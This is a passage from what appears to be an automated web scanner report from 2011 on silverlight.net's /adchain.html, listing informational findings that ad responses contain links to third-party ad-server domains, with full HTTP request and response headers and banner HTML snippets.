User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:51 GMT
Content-Length: 285


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=475&CampaignID=1917&AdvertiserID=12&BannerID=2644&SiteID=2&RandomNumber=1305077725&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/pushdown.gif" alt="CompOnePushDown"></a>
...[SNIP]...

23.556. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=wnwczr55budo0sz2rgg0wk45
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:55:07 GMT
Content-Length: 376


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=700&AdvertiserID=11&BannerID=324&SiteID=6&RandomNumber=282781170&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DV-300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.557. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=465&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:13 GMT
Content-Length: 371


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=465&CampaignID=1858&AdvertiserID=9&BannerID=2821&SiteID=2&RandomNumber=1132454916&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/WP7_300x250.jpg" width="300" height="250" alt="Advertising - Telerik" align="Center" border="0"></a>
...[SNIP]...

23.558. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:27 GMT
Content-Length: 383


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=715&AdvertiserID=59&BannerID=503&SiteID=6&RandomNumber=1188217110&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_Spread%20728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.559. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:20 GMT
Content-Length: 389


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=733&AdvertiserID=68&BannerID=419&SiteID=6&RandomNumber=990317793&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Telerik-TeamPulse-728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.560. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:58 GMT
Content-Length: 366


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=1990&AdvertiserID=52&BannerID=2626&SiteID=2&RandomNumber=1749444995&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/AMP7_Launch_Jan11_728x90_M1.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.561. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=wnwczr55budo0sz2rgg0wk45
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:55:07 GMT
Content-Length: 452


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=2065&AdvertiserID=40&BannerID=2792&SiteID=2&RandomNumber=1082217969&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/728x90DASP_bluylwwht_silverlighthosting_5m_SM.gif" width="728" height="90" alt="Silverlight Hosting for Only $5/month! Click Here and Sign Up Today!" align="Center" border="0"></a>
...[SNIP]...

23.562. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=477 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:20 GMT
Content-Length: 261


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=477&CampaignID=1954&AdvertiserID=12&BannerID=2680&SiteID=2&RandomNumber=1517562033&Keywords=" target="_blank" class="icon_sponsor">
140+ Silverlight Samples</a>
...[SNIP]...

23.563. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=476 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:03 GMT
Content-Length: 531


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=1718746394&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/LDN.120x90.png" /></a>
<p>Practical video tutorials for Silverlight, WPF, AJAX, ASP.NET & more.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=1718746394&Keywords=" target="_blank">
Learn More</a>
...[SNIP]...

23.564. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:45 GMT
Content-Length: 390


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=733&AdvertiserID=68&BannerID=419&SiteID=6&RandomNumber=1969163421&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Telerik-TeamPulse-728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.565. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:57 GMT
Content-Length: 394


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=2084&AdvertiserID=2&BannerID=2807&SiteID=2&RandomNumber=229043918&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/1_MotionFramework-300x250-April.jpg" width="300" height="250" alt="Advertising - Infragistics" align="Center" border="0"></a>
...[SNIP]...

23.566. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=wnwczr55budo0sz2rgg0wk45
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:55:06 GMT
Content-Length: 389


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=2084&AdvertiserID=2&BannerID=2809&SiteID=2&RandomNumber=1616061270&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/SL-DataGRID-300x250-April.jpg" width="300" height="250" alt="Advertising - Infragistics" align="Center" border="0"></a>
...[SNIP]...

23.567. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=472 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:54 GMT
Content-Length: 408


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=472&CampaignID=1918&AdvertiserID=124&BannerID=2646&SiteID=2&RandomNumber=1416021601&Keywords=" target="_blank">
<img class="corner_image" src="http://ads.asp.net/ads/page_flip.png" alt="" />
<span class="ad_block">
<img class="open" src="http://ads.asp.net/ads/LDN.Peel-Down-OptionB.png" />
</span>
...[SNIP]...

23.568. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=474 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:39 GMT
Content-Length: 261


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=474&CampaignID=1920&AdvertiserID=2&BannerID=2648&SiteID=2&RandomNumber=1497337388&Keywords=" class="icon_sponsor" target="_blank">
High Performance DataGrid</a>
...[SNIP]...

23.569. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/termsofuse.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:22 GMT
Content-Length: 374


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=698&AdvertiserID=11&BannerID=325&SiteID=6&RandomNumber=269266692&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DV-728x90.png" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.570. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:45 GMT
Content-Length: 366


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=1869&AdvertiserID=57&BannerID=2379&SiteID=2&RandomNumber=1697132536&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/DEBNR-SL-Grid-072010-728x90.png" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.571. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:13 GMT
Content-Length: 424


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=708&AdvertiserID=70&BannerID=560&SiteID=6&RandomNumber=2036278431&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK2011-TechNet_RON_728x90-Banner-01.jpg" width="728" height="90" alt="Advertising - Diskeeper" align="Center" border="0"></a>
...[SNIP]...

23.572. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
